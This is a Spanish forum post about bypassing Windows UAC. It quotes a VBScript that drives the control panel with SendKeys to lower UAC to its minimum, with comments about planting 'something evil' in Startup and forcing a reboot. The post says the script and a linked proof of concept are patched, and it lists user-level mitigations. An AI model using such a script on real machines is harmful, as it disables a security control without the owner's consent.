bueno estuve investigando otros exploit para hacer bypass pero ya estan patch
ejemplos:
Mostrar/Ocultar
'// 1337H4x Written by _____________
'// (12 year old)
Set WshShell = WScript.CreateObject("WScript.Shell")
'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder
'// Reboot the system
'// WshShell.Run "shutdown /r /f"
este script fue reparado (almenos en mi win7 sp1 no funciona)
por lo cual mediante codigo ya es imposible (lo que hacia era abrir uac en panel de control , en forma oculta y aceptaba todas las ventanas con los senkeys para desactivarlo)
y este poc que ya esta parchado
[Enlace externo eliminado para invitados]
solo funciona si windows 7 no tinen las update al dia.
por lo cual actualmente solo funciona la autoelevacion silenciosa(bypass por inyeccion en procesos legitimos de windows)
la unica forma de evitar esto es
elevar al maximo el nivel de uac (un dolor de bolas con tantas ventanas solicitando permisos)
o que la cuenta del usuario que lo ejecute sea de invitado
digamos que esta es la solucion a nivel usuario (pero yo creo que nadie lo haria)
" si existe otros metodos los desconosco".
bueno este bypass uac me llevo meses entenderlo y me ayudo a comprender como funciona la inyeccion en windows , todavia me falta arreglar algunos problemas menores, para que trabaje al 100 %y lograr llevarlo a que trabaje sin inyectar una dll voy a codear algo interesante, y quiero que funcione sin errores asi que me llevaria un tiempo largo
asi que nos vemos y
gracia spor los comentarios.